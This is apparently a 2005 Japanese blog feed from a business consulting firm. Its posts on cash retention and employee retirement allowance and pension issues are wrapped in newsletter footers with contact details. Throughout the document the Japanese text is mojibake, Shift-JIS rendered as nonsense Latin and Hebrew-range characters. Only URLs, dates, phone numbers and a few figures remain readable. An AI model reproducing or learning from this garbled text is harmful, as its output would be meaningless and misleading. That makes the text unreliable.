    @@@@@@@@@@@@@@@@ƒRƒ“ƒTƒ‹ƒeƒBƒ“ƒOƒXƒ^ƒbƒt@ֲ“c

    - -


    -_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/

    - -

    ƒrƒWƒlƒXƒlƒbƒgƒ[ƒN”®‰ן׀@http://www.businessnetwork.co.jp/
    -@“א—e‚ֹײ‚·‚י‚¨–ג‚¢‡‚ם‚¹‚ֽ info@businessnetwork.co.jp
    -@@ƒtƒ[ƒ_ƒCƒ„ƒ‹F@0120-533-336
    -............................................................................
    -...................................................

    - -

    ‚±‚ּƒ[ƒ‹ƒ}ƒKƒWƒ“‚ֽA‰‹‚ֹ‘—¿¿‹’¸‚¢‚½•‚ֹ‚¨“ֽ‚¯‚³‚¹‚ִ‚¢‚½‚¾‚¢
    -‚ִ‚¨‚ט‚‚·B•s—v‚ּך‡‚ֽ‚¨ט”‚ֵ‚·‚×Aˆָ‰÷‚ּƒAƒhƒƒX‚‚ֵ‚²˜A—‚­‚¾
    -‚³‚¢B info@businessnetwork.co.jp
    -............................................................................
    -...................................................

    ]]> -
    -
    - -¡o‰c‚ֶ‚ֵֽI“I‚ֹƒLƒƒƒbƒVƒ…‚נc‚µ‘‚ג‚·‚±‚ֶ - -2005-04-11T03:52:20Z -2005-04-07T01:46:35Z -tag:setsuzei119.jp,2005://1.160 -2005-04-07T01:46:35Z -o‰c‚ֵּI“I‚ָ–•W‚ֶ‚ֽBƒLƒƒƒbƒVƒ…‚נc‚·‚±‚ֶ‚ּo‰cׂ‚ֶ‚µ‚ִ‚ּSֿ‚א‚ט‚ֶ‚ֽB - -b-admin - - - -©ָ‘–{`¬ - -„‹₪‚ֽ–ˆ“ת‘½‚­‚ּo‰cׂ—l‚ֶ‚¨‰ן‚¢‚³‚¹‚ִ‚¢‚½‚¾‚¢‚ִ‚¨‚ט‚‚·‚×AF—l‚ֹ‹₪’‚·‚י‚²¿–ג‚ֶ‚¢‚₪‚©A‚²—v–]‚ּ‚ז‚₪‚ָ‚א‚ּ‚ ‚ט‚‚µ‚ִAu‚ָ‚ס‚©i“K“–‚ֹ‚²‚‚©‚·j‚₪‚‚¢•–@‚ֽ‚ ‚ט‚‚¹‚ס‚©Hv‚ֶ‚¢‚₪‚א‚ּ‚ׂ ‚ט‚‚·B

    - -

    ‚א‚¿‚כ‚ס‚»‚ּ‚ז‚₪‚ָ•–@‚ֽ‘¶‚µ‚ָ‚¢‚ם‚¯‚ֵA•¾׀‚ֶ‚µ‚ִ‚א“–‘R‚ֵ‚·‚×Ay‡–@“I‚ָzֵ•–@‚נֵ—m‚ֶ‚ֶ‚א‚ֹƒAƒhƒoƒCƒX‚³‚¹‚ִ‚¢‚½‚¾‚¢‚ִ‚¢‚י‚ם‚¯‚ֵ‚·B

    - -

    ‚µ‚©‚µA‚»‚ּ”wi‚ֹ‚ֽ”סם‚ֵֹ—¦‚ׂ‚­A‚µ‚©‚א‘SzƒLƒƒƒbƒVƒ…‚ֵ”[‚‚ָ‚¯‚ך‚־‚ָ‚ח‚¢‚ָ‚¢ֵ‹א‚ֽ‰½‚ֶ‚©‚ָ‚ח‚ָ‚¢‚א‚ּ‚©A‚ֶ‚¢‚₪o‰cׂ‚ּ״ְ‚ָv‚¢‚ׂ‚ך‚ִ‚¢‚‚·B

    ]]> -ֵ‹א‚ֶo‰c‚ֶ‚ֽA״‚ֱ‚ִ‚א״‚ך‚ָ‚¢ײW‚ֹ‚ ‚י‚±‚ֶ‚ֽ–ְ‚ֵ‚·B

    - -


    -o‰c‚נ„‚י–@—¥‚ֹ‚ֵֽ–@‚ּ‚‚©‚ֹA₪–@‚ג״”זˆר–@‚ָ‚ַ‚ׂ ‚ט‚‚·‚×A‹א‘K‚×—‚‹­§—ֽ‚נ‚ֱ‚ִ‚¢‚י‚ּ‚ֽAמ–{“I‚ֵֹ–@‚¾‚¯‚ֵ‚·B

    - -


    -—]’k‚ֵ‚·‚×A‚ז‚­u‰´‚ֽ”‚ּ‚±‚ֶ‚ֽ‚ם‚©‚ח‚סv‚ֶ‹¹‚נ’£‚ֱ‚ִi־j¾‚ֱ‚ִ‚¢‚יo‰cׂ‚ּ•‚נ‚¨©‚©‚¯‚µ‚‚·‚µAo‰cׂ‚ֹ‚ֽ‚¢‚כ‚¢‚כ‚ָƒ^ƒCƒv‚ׂ ‚ט‚‚·B

    - -

    ”²Q‚ּ‰c‹ֶƒZƒ“ƒX‚נ‚ֲlA‹Zp”§‚נ©”F‚µא–±‚ֹ‚ֽ‚‚ֶ‚ס‚ַ–³“’…‚ָlA”‚ֹ׳‚©‚­A‚‚½‚µ‚¢lA—lX‚ֵ‚·B

    - -


    -lװ‚ּ«i‚ֽˆך’·ˆך’Z‚ֵ‚ ‚ט‚‚µ‚ִu³‚µ‚¢«iv‚ֶ‚¢‚₪‚א‚ּ‚ב¶‚µ‚ָ‚¢‚ז‚₪‚ֹAo‰c‚ֹ‚ֽyג‘־“I‚ֹ³‚µ‚¢‚ג‚ט•z‚ֶ‚¢‚₪‚א‚ּ‚ֽ‘¶‚µ‚‚¹‚סB

    - -


    -‚±‚₪‚ֵ‚ָ‚¯‚ך‚־‚ָ‚ח‚ָ‚¢‚ֶ‚©A‚±‚₪‚·‚ך‚־ג‘־‚ֹװˆב‚¢‚ָ‚¢‚¾‚ֶ‚©A‚»‚₪‚¢‚₪w•W‚ֽמ–{“I‚ֹ‚ ‚ט‚‚¹‚סB‚ַ‚ּ‚ז‚₪‚ֹo‰c‚µ‚ִ‚¢‚­‚©‚ֽ‘Pˆ«Dˆ«‚ּ”»’f‚א‚‚ִo‰cׂ‚ּƒZƒ“ƒX‚ֹ”C‚³‚ך‚ִ‚¨‚טA‚»‚ך‚¾‚¯‚ֹo‰cׂ‚ּ׃”C‚ֽˆ‚µ‚ִy‚¢‚א‚ּ‚ֵ‚ֽ‚ָ‚¢‚ֵ‚·‚ֻB

    - -

    ---------------------------------------------------------------------

    - -

    @ך–ו‰ֵֶ—m‚ֹ‚ז‚י–³—¿‘’kְ{’†‚ֵ‚·II

    - -

    @‚¨–ג‚¢‡‚ם‚¹‚ֽ‚±‚¿‚ח
    -@ƒz[ƒ€ƒy[ƒW‚©‚ח@http://www.businessnetwork.co.jp/HTM/i-4.html
    -@ƒ[ƒ‹‚ֵ@info@businessnetwork.co.jp
    -@‚s‚d‚k@03-3517-2036@’S“–Fֲ“c

    - -

    ---------------------------------------------------------------------

    - -


    -o‰c‚ֹ‚¨‚¢‚ִװˆב‚¢‚ּ‚ָ‚¢y‘Pz‚ֶ‚ֽu³“–‚ָ—˜‰v‚נד‚°‚י‚±‚ֶv‚­‚ח‚¢‚ּ‚א‚ּ‚ֵ‚·B

    - -

    ‚»‚ּ‚½‚‚ּ•–@˜_‚ֵ‚ ‚יA”ּ”„‚ֵ‚¢‚­‚©A»‘¢‚ֵ‚¢‚­‚©‚ָ‚ַ‚ּמ–{•jB

    - -

    ‘½‚­‚ּ]‹ֶˆץ‚נ•ר‚¦‚י‚ּ‚©A­”‚ֵ‚ג‚ֱ‚ִ‚¢‚­‚ּ‚©A”„דd‹‚©A—˜‰vd‹‚©A״“‚ֹ‘־‚·‚יl‚¦•A‚ ‚י‚¢‚ֽצJ‚ֹ‘־‚·‚י•jA‘I‘נˆ‚ֽ–³ְ‚ֹ‚ ‚ט‚‚·B

    - -


    -‚ַ‚ּ‚ז‚₪‚ָ•«‚ֵ‚ ‚ךA‚±‚ך‚ֽo‰cׂ‚ּ—A©—R‚ָ‘I‘נ‚ֹ”C‚³‚ך‚‚·B

    - -


    -‚µ‚©‚µ­‚ָ‚­‚ֶ‚א¾‚¦‚י‚±‚ֶ‚ֽAo‰c‚ֶ‚ֵֽI“I‚ֹ‚ֽ

    - -

    @y@‘@‹א@‚נ@c@‚µ@‘@‚ג@‚µ@‚ִ@z

    - -

    ‚¢‚©‚ָ‚­‚ִ‚ֽ‚ָ‚ח‚ָ‚¢‚א‚ּ‚ֵ‚ ‚יA‚ֶ‚¢‚₪‚±‚ֶ‚ֵ‚ ‚ט‚‚·B

    - -


    -‰½‚נ“–‚½‚ט‘O‚ּ‚±‚ֶ‚ֶ‚¨‚ֱ‚µ‚ב‚י‚©‚א‚µ‚ך‚‚¹‚ס‚×AƒLƒƒƒbƒVƒ…‚נ‘‚ג‚³‚ָ‚¯‚ך‚־‚ָ‚ח‚ָ‚¢‚ֶ‚¢‚₪”F¯‚×o‰cׂ‚ֹˆ׃O‚ֹ”–‚¢‚ּ‚א–ְ‚ֵ‚·B

    - -


    -‚»‚ּ״‹’‚ֹo‰cv‰ז‘‚ֹ”„ד‚ג—˜‰v‚ּ–•W‚ׂ ‚ֱ‚ִ‚א¡תA‚ ‚י‚¢‚ֽ‚±‚ך‚©‚ח‚ּ5”NװA‚¢‚­‚ח‚ּ‘‹א‚נ‘‰ֱ‚³‚¹‚י‚©‚ֶ‚¢‚ֱ‚½‚±‚ֶ‚נוב‚ֹ‚µ‚½v‰ז‘‚ֽA‚‚ֶ‚ס‚ַ‚¨–‚ֹ‚©‚©‚י‚±‚ֶ‚ׂ ‚ט‚‚¹‚סB

    - -

    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@`‰ס‚ֹ‘±‚­`

    - -

    - -

    _/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/

    - -

    ƒrƒWƒlƒXƒlƒbƒgƒ[ƒN”®‰ן׀@http://www.businessnetwork.co.jp/
    -@“א—e‚ֹײ‚·‚י‚¨–ג‚¢‡‚ם‚¹‚ֽ info@businessnetwork.co.jp
    -@@ƒtƒ[ƒ_ƒCƒ„ƒ‹F@0120-533-336
    -

    ]]> -
    -
    - -]‹ֶˆץ‚ּ‘E‹א–ג‘טi‚Tj - -2005-04-06T07:53:43Z -2005-04-05T06:13:25Z -tag:setsuzei119.jp,2005://1.159 -2005-04-05T06:13:25Z -]‹ֶˆץ‚ּ‘E‹א‚ֹ‚¨‚¯‚יo‰cׂƒTƒCƒh‚ּ–ג‘ט“_‚ֶ‚ֽB - -b-admin - - - -]‹ֶˆץ‘E‹א - -|‰‚‚ִ‚ּ•‚ֽi‚Pj‚©‚ח‚¨“ַ‚‚­‚¾‚³‚¢B

    - -

    u‘E‹א§“xv‚ֹ‚¨‚¯‚יo‰cׂƒTƒCƒh‚ּ–ג‘ט“_‚ֽAIg—p‚ֵd‚¦‚½׀ˆץ‚ׂ—מ‰»‚µA’ט”N‘Eׂ‚ֽ‚¢‚י‚¯‚ך‚ַA‘E‹אi‘Eˆך‹אE‘E”N‹אj‚ּֿ—§‹א‚ָׂ‚¢‚ֶ‚¢‚ֱ‚½ף‹µ‚×”—‚ֱ‚ִ‚«‚ִ‚¢‚ִAu‘E‹א“|Yv‚×»ְ‚ּ‚א‚ּ‚ֶ‚ָ‚י‰ֲ”\«‚ׂ ‚י‚±‚ֶ‚ֵ‚·B

    - -

    ‹X‘E‚·‚י׀ˆץ‚ײx•¥‚ם‚ָ‚­‚ִ‚ֽ‚ָ‚ח‚ָ‚¢‘E‹א‚ּ‘½z‚³‚ֹ‹ֱ‚¢‚½‚`׀‚ּo‰cׂ‚ֽA¡ד‚ּx•¥‚¢‚ֽµ‚µ‚¢‚ֶl‚¦A‰½‚ֶ‚©‘E‹א§“x‚נ”p~‚ֵ‚«‚ָ‚¢‚א‚ּ‚©‚ֶ‰זפ‚µ‚‚µ‚½B

    - -

    ְ‚ֹ‘E‹א§“x‚נ”p~‚·‚י‚ֹ‚ֽAA‹ֶ‹K‘¥‚ּ•ֿX‚ֹ—v‚·‚י–@“I‚ָט‘±‚«‚נ‚µ‚ָ‚­‚ִ‚ֽ‚ָ‚ט‚‚¹‚סB

    ]]> -‚±‚ּ”p~sˆ׳‚ֽ˜J“­נ‚ּ•s—˜‰v•ֿX‚ָ‚ּ‚ֵAo‰cׂƒTƒCƒh‚׈ך•“I‚ֹ”p~‚·‚י‚±‚ֶ‚ֽ‹–‚³‚ך‚¸A]‹ֶˆץ‚ּ“¯ˆ׃‚וK—v‚ֶ‚ָ‚ט‚‚·B

    - -

    ט‘±‚«‚ֶ‚µ‚ִ‚ֽA]‹ֶˆץ‚ֹ‚ז‚ט]‹ֶˆץ‘ד•\‚נ‘IoA‚»‚ּ]‹ֶˆץ‘ד•\‚ּuˆ׃©‘v‚נ“Y•t‚µ‚ִ“ֽo‚נ˜J“­מ€ִ“ֲ‚ײ’סo‚µ‚‚·B

    - -

    uˆ׃©‘v‚ֽu“¯ˆ׃‘v‚ֵ‚ֽ‚ָ‚¢‚ּ‚ֵA‚½‚ֶ‚¦”½‘־ˆ׃©‚׋Lq‚³‚ך‚ִ‚¢‚½‚ֶ‚µ‚ִ‚א˜J“­מ€ִ“ֲ‚ֽף—‚µ‚‚·B‚×A˜Jgװ‚ּƒgƒ‰ƒuƒ‹‚נ”נ‚¯‚יˆ׃–¡‚ֵ‚אA]‹ֶˆץ‘Sˆץ‚ּ“¯ˆ׃‚נ‚ֶ‚ט‚ֲ‚¯‚½‚‚₪‚ׂ¢‚¢‚ֵ‚µ‚ו‚₪B

    - -

    ‚`׀‚ּo‰cׂ‚ֽˆך‹א‚ּx‹‹‚ֶA‹‹—^‚ּƒx[ƒXƒAƒbƒv‚ננ‚ֹ]‹ֶˆץא“¾‚ֹ“®‚­‚±‚ֶ‚ֹ‚µ‚‚µ‚½B
    -iט‘±‚«‚ּ׳‚ֹ‚ֲ‚¢‚ִ‚ֽך–ו‰ֶ‚ֹ‚¨q‚ֻ‚­‚¾‚³‚¢Bj

    - -

    ‚ֶ‚±‚כ‚ֵA‘E‹א‚ּֿ—§‚ִ‚נ–“I‚ֶ‚µ‚½A“Ki‘E”N‹א‚ֽ•½¬‚Q‚S”N‚R‚ֹ´‘¥”p~‚ֹ‚ָ‚ט‚‚·B
    -´‘¥”p~‚ֶ‚¢‚₪‚±‚ֶ‚ֽA¡‚‚ֵ|‹א‚נ‘Sz‘¹‹אZ“‚ֵ‚«‚½‚א‚ּ‚×A‘Sz‘Yvד‚ֹ‚ָ‚י‚ֶ‚¢‚₪‚±‚ֶ‚ֵ‚·B

    - -

    ‚“xoֿ¬’·ת‚ֹ’a¶‚µ‚½‚±‚ּ§“x‚א׀‰ןמ¨‚ּ•ֿ‰»‚ֶ‹₪‚ֹA§“x‚ֶ‚µ‚ִ‚ּg–½‚×I‚ם‚ֱ‚½‚ֶ‚¢‚¦‚י‚ֵ‚µ‚ו‚₪B

    - -

    י‹ֶo‰cׂ‚ֽ‚`׀‚ּ‚ז‚₪‚ֹ‘E‹א§“x‚נ”p~‚·‚י‚©A‘ד‚ם‚ט‚ּֿ—§•–@‚נl‚¦‚י•K—v‚×o‚ִ‚«‚‚µ‚½B

    - -

    l‚¦‚ָ‚­‚ִ‚ֽ‚ָ‚ח‚ָ‚¢‚±‚ֶ‚ֽA”p~‚·‚יך‡‚ֹ‚ֽ˜Jgװ‚ּM—ײW‚נ¸‚¢׀ˆץ‚ּƒ‚ƒ`ƒx[ƒVƒ‡ƒ“‚×’ב‰÷‚µ‚½‚טA—DG‚ָ׀ˆץ‚‚ַ—ַ‚¢נ‚ּ‘¼׀‚ֹ“]E‚³‚ך‚ִ‚µ‚‚₪‰ֲ”\«‚ׂ ‚י‚±‚ֶ‚ֵ‚·B

    - -

    ˆך•A‘ד‚ם‚ט‚ּֿ—§•–@‚ֵ‚·‚×A“Ki‘E”N‹א‚ֶ“¯—l‚ָm’ט‹‹•t^‚ּי‹ֶ”N‹א‚גAm’ט‹’o^‚ּm’ט‹’o”N‹אi‚S‚O‚P‚jj‹y‚ׁ’†¬י‹ֶ‘E‹א‹₪ֿ“™‚×l‚¦‚ח‚ך‚‚·B

    - -

    ‚‚½Aƒoƒ‰ƒ“ƒX‚ּז‚ך‚½‘E‹א§“x‚ֶׂ‚ך‚י‚ֶ‚¢‚₪‚±‚ֶ‚ֵAm’ט‹‹•t^‚ֶm’ט‹’o^‚נ‘g‚‡‚ם‚¹‚יי‹ֶ‚א‘½‚­‚ָ‚ֱ‚ִ‚«‚‚µ‚½B
    -‚ָ‚©‚ֵ‚ֽA•—˜ת¶‚ּ[ְ‚ֹ‚ָ‚י‚ֶ‚¢‚₪‚±‚ֶ‚ֵ¶–½•¯‚נ—Lרˆ—p‚µ‚½•–@‚×’†¬י‹ֶ‚ֹl‹C‚×o‚ִ‚«‚ִ‚¢‚‚·B

    - -

    ‚¢‚¸‚ך‚ֹ‚µ‚ִ‚א‚»‚ך‚»‚ך‚ֹƒƒƒbƒgEƒfƒƒƒbƒg‚ׂ ‚טAeי‹ֶ‚ְּ‘װ‚ֹ‘¥‚µ‚½•–@‚נ“¢‚·‚י•K—v‚ׂ ‚י‚ֵ‚µ‚ו‚₪B
    -

    ]]> -
    -
    - -]‹ֶˆץ‚ּ‘E‹א–ג‘טi‚Sj - -2005-04-06T00:41:42Z -2005-03-30T06:18:04Z -tag:setsuzei119.jp,2005://1.158 -2005-03-30T06:18:04Z -’†¬י‹ֶ‚ֽw“Ki‘E”N‹אx‚ֹ“‚י‚½‚‘E‹א‹K’ט‚נל¬‚µA‚»‚ּ‚±‚ֶ‚×o‰cׂ‚ּ“×’ֹ‚ּם‚ֹ‚ָ‚ֱ‚ִ‚¢‚‚·B - -b-admin - - - -]‹ֶˆץ‘E‹א - -|‰‚‚ִ‚ּ•‚ֽi‚Pj‚©‚ח‚¨“ַ‚‚­‚¾‚³‚¢B

    - -

    י‹ֶ‚ֽw“Ki‘E”N‹אx‚ֹ‰ֱ“‚·‚יˆ׳A‘E‹א‹K’צ‚נל¬‚µA˜J“­מ€ִ“ֲ‚ײ’סo‚µ‚‚µ‚½B
    -‚±‚±‚‚ֵ‚ֽ‘O‰ס‚‚ֵ‚ֹ‘‚«‚‚µ‚½B

    - -

    w“Ki‘E”N‹אx‚ֹ‰ֱ“‚µ‚ִ‚¢‚י‚`׀‚ּo‰cׂ‚ֽ‹X‘E‚·‚י׀ˆץ‚ײ‚ּ‘E‹א‚ּx•¥‚¢‚ֹ‚ֲ‚¢‚ִ•sˆְ‚ֹ‚ָ‚ט‚‚µ‚½B

    - -

    ˆ׃‚נˆ‚µ‚ִA˜J“­מ€ִ“ֲ‚ֹ’סo‚µ‚½‘E‹א‹K’צ‚ֹמ‚ֳ‚¢‚ִA]‹ֶˆץ‚ּ‘E‹אx‹‹z‚נZ‚µ‚ִ‚‚‚µ‚½‚×A‚»‚ּz‚ּ‘½‚³‚ֹ‹ֱ‚¢‚ִ‚µ‚‚¢‚‚µ‚½B

    - -


    -‚»‚א‚»‚א(‰‹‚ֽ‚א‚ֶ‚ז‚ט»‚א)’†¬י‹ֶ‚ֹ‚ֽ‘E‹א‹K’צ‚נל¬‚·‚י’m¯‚נ‚ֱ‚½ƒvƒ‚ֽ‚¢‚‚¹‚סB

    - -

    ‚¢‚´“Ki‘E”N‹א‚ּ‰ֱ“נ‚ֵ‚ ‚י‘E‹א‹K’צ‚נ—pˆ׃‚µ‚½‚­‚ִ‚אל‚ט•‚׉נ‚ט‚‚¹‚ס‚ֵ‚µ‚½B

    - -

    ‚»‚ּ‚½‚A•¯‰ן׀‚×מ–{‹‹˜A“®^‚ּ—`‚ני‹ֶ‚ֹ”z‚ט‚‚µ‚½B
    -‚»‚ךּ‚©A“ת–{‚ּ‚‚ֶ‚ס‚ַ‚ּי‹ֶ‚×מ–{‹‹˜A“®^‚נּ—p‚µ‚ִ‚¢‚‚·B
    -‚»‚µ‚ִA‚±‚ּ—`‚ֽA‚ַ‚¿‚ח‚©‚ֶ‚¢‚₪‚ֶ‘וי‹ֶ‚¯‚ּ“א—e‚ֵ‚µ‚½B

    - -

    מ–{‹‹˜A“®^‚ּ‘E‹א‚ּvZ®‚ֽ‘E‚ּמ–{‹‹~‹־‘±”N”~‘E–—RW”=‘E‹א‚ּz@‚ֶ‚ָ‚ט‚‚·B

    - -

    A׀‚א—בO‚ֵ‚ָ‚­A‹XA‹‹—¿40–‰~A‹־‘±”N”40”NA‘E–—R–ג‘ט‚ָ‚µ‚ּB‚³‚ס‚בE‚·‚י‚ּ‚ֵo‰cׂ‚×Z‚µ‚ִ‚‚י‚ֶA40–‰~~40”N~1.0=1,600–‰~‚ֶ‚¢‚₪‘½z‚ּ”‚×Zo‚³‚ך‚‚µ‚½B

    - -

    o‰cׂ‚ּ’Q‚«‚ׂם‚©‚ט‚‚·B

    - -

    ְA‚±‚ּ‚ז‚₪‚ֹ‘½z‚ּ‘E‹א‚נx•¥‚ם‚ָ‚­‚ִ‚ֽ‚ָ‚ח‚ָ‚¢ף‹µ‚ֹ‚ָ‚ֱ‚ִ‚א‚‚ֶ‚ס‚ַ‚ּי‹ֶ‚ֵ‘‹א”Po‚דן‚µ‚¢‚ּ‚ֵ‚ֽ‚ָ‚¢‚ֵ‚µ‚ו‚₪‚©B
    -‚ֵ‚אAx•¥‚¢‚ֽג‘־“I‚ָ‚א‚ּ‚ָ‚ּ‚ֵ‚·cB

    - -


    -‚»‚א‚»‚א“Ki‘E”N‹א‚ֽAX‚ּ|‹א‚נ‰^—p‚µֿ‚—§‚ִ‚½z‚נ‘E‹א‚ֹ[“–‚·‚י‚±‚ֶ‚נ–“I‚ֶ‚µ‚ִ‚¢‚‚·B

    - -

    5.5%‚ֵ‰^—p‚³‚ך‚ִ‚ֽ‚¶‚‚ִA—\’ט‚µ‚ִ‚¢‚½‘E‹אz‚×’™‚‚י‚ּ‚ֵ‚·‚×A•½¬14”N“x‚ּ“_‚ֵ‚ּ—˜—¦‚ֽ0.75%‚ֶ‚ָ‚ֱ‚ִ‚¢‚‚·B

    - -

    ‚»‚ּˆב‚¢‚נX1–‰~A40”Nװֿ‚—§‚ִ‚½—ב‚ֵ”הr‚·‚י‚ֶ
    -‹א—˜5.5%‚ּך‡A³–{480–‰~@—˜‘§1,261–‰~c‡v1,741–‰~
    -‹א—˜0,75%‚ּך‡A³–{480–‰~@—˜‘§79.6–‰~c‡v559.6–‰~
    -‚ָ‚ס‚ֶ1040.4–‰~‚ּ•s‘«‚×”­¶‚µ‚‚·B
    -‚»‚ּ•s‘«z‚נ’N‚וג‚₪‚©‚ֶ‚¢‚₪‚ֶA‚א‚¿‚כ‚ס‰ן׀‚ֵ‚·cB

    - -

    •s‘«•ׂנ“Ki‘E”N‹א‚ֵ•ג‚¨‚₪‚ֶ‚·‚י‚ֶA“–‘RA•¯—¿‚×ד‚ׂט‚‚·B

    - -

    »Aי‹ֶ‚דKi‘E”N‹א‚ֹx•¥‚ֱ‚ִ‚¢‚י|‹א‚ּ•½‹ֿ‚ֽ5A6ח‰~‚ֵ‚·B
    -‘E‹א‘Sz‚נ‘E”N‹א‚ֵ€”ץ‚µ‚ז‚₪‚ֶ‚·‚י‚ֶ|‹א‚ֽ–ס3”{‚ֹ’µ‚ֻד‚ׂט‚‚·B

    - -

    ‚µ‚©‚µA‚»‚ס‚ָף‘װ‚ֵ‚אA|‹א‘z‚ּ’סˆִ‚ֽ‚¹‚¢‚÷‚¢2”{’צ“x‚µ‚©‚³‚ך‚ִ‚¢‚‚¹‚סB
    -•K‘R“I‚ֹ‘E‹א‘‹א‚ֽƒVƒ‡[ƒg‚·‚י‚ּ‚ֵ‚·‚×A‚±‚ְּ‘װ‚נ”cˆ¬‚µ‚ִ‚¢‚ָ‚¢o‰cׂ‚ּ•‚א‘½‚­‚¢‚ח‚ֱ‚µ‚ב‚י‚ֶv‚¢‚‚·B

    - -

    ‚‚½A|‹א‚·‚ָ‚ם‚¿•¯—¿‚ֶAֿ‚—§‚ִ‘Y‚ּ—¼•‚ֹ•¯––±”ן‚ֶ‚¢‚₪ט”—¿‚נ•¯‰ן׀‚ֹx•¥‚ֱ‚ִ‚¢‚‚·B

    - -

    ‰^—p—˜—¦‚׉÷‚ֱׂ‚ִ‚¢‚י»‚ֵ‚אA‚±‚ּ––±”ן‚ּ‹אz‚ֽ‚‚ֶ‚ס‚ַ•ֿ‚ם‚ֱ‚ִ‚‚¹‚סB
    -—˜‘§‚ז‚ט‚א––±”ן‚ּ‹אz‚ב½‚­‚ָ‚ֱ‚ִ‚µ‚‚₪‚ֶ‚¢‚₪–{––“]“|‚ּ‹tƒUƒ„»‚׋N‚±‚ט‚₪‚י‰ֲ”\«‚ׂ ‚ט‚‚·B(»ְ‚ֹ‹N‚±‚ֱ‚ִ‚¢‚י‚ֶ‘‚­‚׳‚«‚©‚א‚µ‚ך‚‚¹‚סB)

    - -


    -ˆָדA‰½‰ס‚©‚ֹ•ׂ¯‚ִ]‹ֶˆץ‚ּ‘E‹א–ג‘ט‚ֹ‚ֲ‚¢‚ִ‘‚«‚‚µ‚½B
    -‹ן‘ּ“I‚ָ‰נˆפ‚ֹ‚ֲ‚¢‚ִ‚ֲֽX‚ּי‹ֶ‚ֹ‚ֲ‚¢‚ִˆ‚ָ‚ט‚‚·‚ּ‚ֵA‚±‚±‚ֵ‚ֽ„ˆ₪‚³‚¹‚ִ‚¢‚½‚¾‚«‚‚·B
    -‚²S”zE‚²•s–¾‚ּ“_‚ׂ ‚ט‚‚µ‚½‚ח•¾׀‚ ‚ִ‚¨–ג‡‚¹‚­‚¾‚³‚¢B

    - -

    ‰ס‚ֵּI‰ס‚ֹ]‹ֶˆץ‚ּ‘E‹א–ג‘ט‚ֹ‚ֲ‚¢‚ִ‚‚ֶ‚‚³‚¹‚ִ’¸‚«‚‚·B

    - -

    |i‚Tj‚ֹ‘±‚­

    ]]> - -
    -
    - -]‹ֶˆץ‚ּ‘E‹א–ג‘טi‚Rj - -2005-04-06T00:44:57Z -2005-03-24T08:41:01Z -tag:setsuzei119.jp,2005://1.157 -2005-03-24T08:41:01Z -]‹ֶˆץ‚ּ‘E‹א–ג‘ט‚ֽo‰cׂ‚נ”Y‚‚¹‚ִ‚¢‚‚·B -“ֱ‚ֹw“Ki‘E”N‹אx‚ּ‰ֱ“‚ֹ‚ז‚ט‘E‹א‚ּx•¥‚¢‚נג‘־‚ּ‚א‚ּ‚ֹ‚µ‚ִ‚µ‚‚¢‚‚µ‚½B - -b-admin - - - -]‹ֶˆץ‘E‹א - -|‰‚‚ִ‚ּ•‚ֽi‚Pj‚©‚ח‚¨“ַ‚‚­‚¾‚³‚¢B

    - -

    ¡‰ס‚ֽo‰cׂ‚ּכ‰נ‚ֹ‚ֲ‚¢‚ִ‚¨˜b‚µ‚‚·B

    - -

    w“Ki‘E”N‹אx‚ֹ‰ֱ“‚·‚י‚±‚ֶ‚ֹ‚ז‚ט”Cˆ׃‚ֵx•¥‚₪‚׳‚«‘E‹א‚×ג‘־“I‚ָ‚א‚ּ‚ֹ•ֿ‚ם‚ֱ‚ִ‚µ‚‚₪‚ֶ‘O‰ס‘‚«‚‚µ‚½B

    - -

    ‰½ּA•ֿ‚ם‚ֱ‚ִ‚µ‚‚₪‚ּ‚ֵ‚µ‚ו‚₪‚©B

    - -

    ְ‚ֽw“Ki‘E”N‹אx‰ֱ“‚ּ—v‚ּˆך‚ֲ‚ֹA‘E‹א‹K’צ‚נל¬‚µA˜J“­מ€ִ“ֲ‚ײ•K‚¸’סo‚·‚י‚ֶ‚¢‚₪‚א‚ּ‚ׂ ‚ט‚‚·B

    - -

    ‚ֲ‚‚טA"“Ki‘E”N‹א‰ֱ“‘E‹א‹K’צ‚נל¬‚µ˜J“­מ€ִ“ֲ‚ײ’סo"‚ֶ‚¢‚₪‚±‚ֶ‚ֵ‚·‚©‚חA‰ֱ“‚ֶ“¯‚ֹ‘E‹א‹K’צ‚ּ‘¶i‘E‹א‚ּx•¥‚¢j‚נצ‚ֹ”F‚‚½‚±‚ֶ‚ֹ‚ָ‚ט‚‚·B

    - -

    ‚·‚ָ‚ם‚¿A’ט‚‚ח‚ך‚½‘E”N‹א‚נ•K‚¸x•¥‚₪‹`–±‚×–‹ֶו‚ֹ”­¶‚µ‚½‚ֶ‚¢‚₪‚±‚ֶ‚ֵ‚·B

    - -

    ‚»‚µ‚ִA‘½‚­‚ּo‰cׂ‚×כ‰נ‚µ‚ִ‚¢‚י“_‚ֵ‚·‚×A“Ki”N‹א‚ֹ‰ֱ“‚µ‚½‚ֶ‚«‚ֽm‚©‚ֹ‘E‹א‹K’צ‚ֶƒZƒbƒg‚ֶ‚ָ‚ֱ‚ִ‚¢‚‚µ‚½B
    -‚×A‰נ–ס‚µ‚½‚ֶ‚«‚אƒZƒbƒg‚ֱֵ–ֵ‚ֶ‚¢‚₪‚ם‚¯‚ֵ‚ֽ‚ָ‚­A‘E‹א‹K’צ‚ּ‚‚ֽ¶‚«‘±‚¯‚ִA]‹ֶˆץ‚ֹ‘־‚·‚י‘E‹א‚ֲּ–±‚×o‰c‚נ‹÷‚©‚·‚ּ‚ֵ‚·B
    -‚»‚µ‚ִA‚»‚ּ‚±‚ֶ‚ֹ‹C•t‚¢‚ִ‚¢‚ָ‚¢o‰cׂ‚א‘½‚¢‚ּ‚ֵ‚·B

    - -

    ‚±‚ך‚ֽ‘ו•ֿ‚ָ‚±‚ֶ‚¾B
    -‚ֶQ‚ִ‚½‚`׀‚ּo‰cׂ‚ֽAu‘E‹א‚ּx•¥‚¢v‚ֶ‚¢‚₪—\ת‚µ‚ִ‚¢‚ָ‚©‚ֱ‚½‘‹אש—v‚ֹ•נ‘R‚ֶ‚µ‚‚µ‚½B

    - -

